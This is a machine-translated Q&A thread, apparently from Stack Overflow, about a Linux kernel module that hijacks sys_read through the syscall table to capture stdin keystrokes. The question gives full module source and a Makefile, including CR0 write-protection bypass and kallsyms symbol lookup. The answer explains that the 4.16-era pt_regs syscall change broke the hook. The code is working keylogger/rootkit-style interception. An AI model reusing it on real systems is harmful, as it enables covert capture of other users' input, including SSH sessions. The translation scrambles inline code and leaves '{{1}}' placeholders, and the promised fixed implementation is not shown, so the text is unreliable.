此模块完全劫持了用户的控制台:https://pastebin.com/99YJFnaq
它是Linux内核4.12,Kali 2018.1.。
现在,我已经安装了最新版本的Kali-2019.1。它使用内核4.19:
Linux kali 4.19.0-kali1-amd64#1 SMP Debian 4.19.13-1kali1 (2019-01-03)x86_64 GNU / Linux
我正在尝试捕获任何东西,但fd == 0时没有任何东西在流中。
changelogs ...
我已经找到了这样的模块kpti,它可能会执行类似的操作,但是该模块未安装在Kali 2019.1。中。
请帮我找出这段代码中hacked_read停止听到sys_read()的确切原因:
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#define BUFFER_SIZE 512
#define MODULE_NAME "hacked_read"
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.1" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail@domain.com>" );
static char debug_buffer[ BUFFER_SIZE ];
unsigned long ( *original_read ) ( unsigned int, char *, size_t );
void **sct;
unsigned long icounter = 0;
static inline void rw_enable( void ) {
asm volatile ( "cli \n"
"pushq %rax \n"
"movq %cr0, %rax \n"
"andq $0xfffffffffffeffff, %rax \n"
"movq %rax, %cr0 \n"
"popq %rax " );
}
static inline uint64_t getcr0(void) {
register uint64_t ret = 0;
asm volatile (
"movq %%cr0, %0\n"
:"=r"(ret)
);
return ret;
}
static inline void rw_disable( register uint64_t val ) {
asm volatile(
"movq %0, %%cr0\n"
"sti "
:
:"r"(val)
);
}
static void* find_sym( const char *sym ) {
static unsigned long faddr = 0; // static !!!
// ----------- nested functions are a GCC extension ---------
int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
if( 0 == strcmp( (char*)data, sym ) ) {
faddr = addr;
return 1;
} else return 0;
};// --------------------------------------------------------
kallsyms_on_each_symbol( symb_fn, (void*)sym );
return (void*)faddr;
}
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
unsigned long r = 1;
if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
return original_read( fd, buf, count );
} else {
icounter++;
if ( icounter % 1000 == 0 ) {
info( "test2 icounter = %ld\n", icounter );
info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
}
r = original_read( fd, buf, count );
strncat( debug_buffer, buf, 1 );
if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
debug_buffer[0] = '\0';
return r;
}
}
int hacked_read_init( void ) {
register uint64_t cr0;
info( "Module was loaded\n" );
sct = find_sym( "sys_call_table" );
original_read = (void *)sct[ __NR_read ];
cr0 = getcr0();
rw_enable();
sct[ __NR_read ] = hacked_read_test;
rw_disable( cr0 );
return 0;
}
void hacked_read_exit( void ) {
register uint64_t cr0;
info( "Module was unloaded\n" );
cr0 = getcr0();
rw_enable();
sct[ __NR_read ] = original_read;
rw_disable( cr0 );
}
module_init( hacked_read_init );
module_exit( hacked_read_exit );
Makefile:
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)
TARGET = hacked_read
obj-m := $(TARGET).o
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
@rm -f *.o .*.cmd .*.flags *.mod.c *.order
@rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
@rm -fR .tmp*
@rm -rf .tmp_versions
我敢肯定,像之前一样,所有东西都会继续调用sys_read()。 tee,bash,vi-在短时间内无法更改所有这些内容,但只能更改linux-kernel。
通过旁路我会感激代码。
答案 0 :(得分:2)
一些故障排除如下:
read()。他们仍然继续称呼它。sys_read()的指针成功替换为指向hacked_read_test()的指针。read()系统调用就像原始模块一样工作。4.16和4.16.2之间(即 2018年4月1日和 2018年4月12日之间)。 考虑到这一点,我们要检查的提交列表非常狭窄,并且更改可能在syscalls机制中。好吧,看起来像this commit is what we are looking for(还有更多)。
此提交的关键部分是更改由SYSCALL_DEFINEx定义的函数的签名,以便它们接受a pointer to struct pt_regs而不是syscall参数,即sys_read(unsigned int fd, char __user * buf, size_t count)变成sys_read(const struct pt_regs *regs) 。这意味着hacked_read_test(unsigned int fd, char *buf, size_t count)不再是sys_read()的有效替代品!
因此,对于新内核,您将sys_read(const struct pt_regs *regs)替换为hacked_read_test(unsigned int fd, char *buf, size_t count)。为什么这不会崩溃,而是像原来的sys_read()一样起作用?再次考虑hacked_read_test()的简化版本:
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
if ( fd != 0 ) {
return original_read( fd, buf, count );
} else {
// ...
}
}
好吧。第一个函数参数通过%rdi寄存器传递。 sys_read()的调用方将指向struct pt_regs的指针放入%rdi中并执行呼叫。执行流程进入hacked_read_test()内部,并且检查第一个参数fd是否不为零。考虑到此参数包含一个有效的指针而不是文件描述符,此条件成功,控制流直接转到original_read(),后者接收fd值(即,实际上,指向{{1}的指针) })作为第一个参数,然后依次成功使用它原来的意图。因此,由于内核struct pt_regs您的4.16.2 有效的工作方式如下:
hacked_read_test()要确保这一点,您可以尝试使用unsigned long hacked_read_test( const struct pt_regs *regs ) {
return original_read( regs );
}
的替代版本:
hacked_read_test()编译并unsigned long hacked_read_test( void *ptr ) {
if ( ptr != 0 ) {
info( "invocation of hacked_read_test(): 1st arg is %d (%p)", ptr, ptr );
return original_read( ptr );
} else {
return -EINVAL;
}
}
版本之后,您将获得以下内容:
insmod您可以创建invocation of hacked_read_test(): 1st arg is 35569496 (00000000c3a0dc9e)
的工作版本,但该实现似乎与平台有关,因为您必须从hacked_read_test()的适当寄存器字段中提取参数(对于{ {1}}分别是第一个,第二个和第三个系统调用参数的regs,x86_84和%rdi。
下面的工作%rsi实现(已在内核%rdx上进行了测试)。
x86_64